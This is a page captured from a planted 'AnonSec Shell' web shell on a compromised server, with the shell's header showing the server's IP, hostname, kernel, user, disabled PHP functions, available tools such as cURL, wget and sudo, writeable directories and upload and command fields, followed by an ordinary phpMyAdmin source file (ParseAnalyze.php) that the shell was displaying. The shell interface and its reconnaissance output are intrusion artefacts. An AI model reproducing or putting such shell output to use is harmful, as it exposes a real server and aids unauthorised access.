AnonSec Shell
Server IP : 185.86.78.101  /  Your IP : 216.73.216.171
Web Server : Apache
System : Linux 675867-vds-valikoshka1996.gmhost.pp.ua 5.4.0-150-generic #167-Ubuntu SMP Mon May 15 17:35:05 UTC 2023 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /www/server/phpmyadmin/phpmyadmin_7622b317d678fe39/libraries/classes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /www/server/phpmyadmin/phpmyadmin_7622b317d678fe39/libraries/classes/ParseAnalyze.php
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Parse and analyse a SQL query
 *
 * @package PhpMyAdmin
 */
declare(strict_types=1);

namespace PhpMyAdmin;

use PhpMyAdmin\Response;
use PhpMyAdmin\SqlParser\Utils\Query;

/**
 * PhpMyAdmin\ParseAnalyze class
 *
 * @package PhpMyAdmin
 */
class ParseAnalyze
{
    /**
     * Calls the parser on a query
     *
     * @param string $sql_query the query to parse
     * @param string $db        the current database
     *
     * @return array
     *
     * @access  public
     */
    public static function sqlQuery($sql_query, $db)
    {
        global $reload;
        // @todo: move to returned results (also in all the calling chain)
        $GLOBALS['unparsed_sql'] = $sql_query;

        // Get details about the SQL query.
        $analyzed_sql_results = Query::getAll($sql_query);

        extract($analyzed_sql_results);
        $table = '';

        // If the targeted table (and database) are different than the ones that is
        // currently browsed, edit `$db` and `$table` to match them so other elements
        // (page headers, links, navigation panel) can be updated properly.
        if (! empty($analyzed_sql_results['select_tables'])) {
            // Previous table and database name is stored to check if it changed.
            $prev_db = $db;

            if (count($analyzed_sql_results['select_tables']) > 1) {

                /**
                 * @todo if there are more than one table name in the Select:
                 * - do not extract the first table name
                 * - do not show a table name in the page header
                 * - do not display the sub-pages links)
                 */
                $table = '';
            } else {
                $table = $analyzed_sql_results['select_tables'][0][0];
                if (! empty($analyzed_sql_results['select_tables'][0][1])) {
                    $db = $analyzed_sql_results['select_tables'][0][1];
                }
            }
            // There is no point checking if a reload is required if we already decided
            // to reload. Also, no reload is required for AJAX requests.
            $response = Response::getInstance();
            if (empty($reload) && ! $response->isAjax()) {
                // NOTE: Database names are case-insensitive.
                $reload  = strcasecmp($db, $prev_db) != 0;
            }

            // Updating the array.
            $analyzed_sql_results['reload'] = $reload;
        }

        return [
            $analyzed_sql_results,
            $db,
            $table,
        ];
    }
}

Anon7 - 2022
AnonSec Team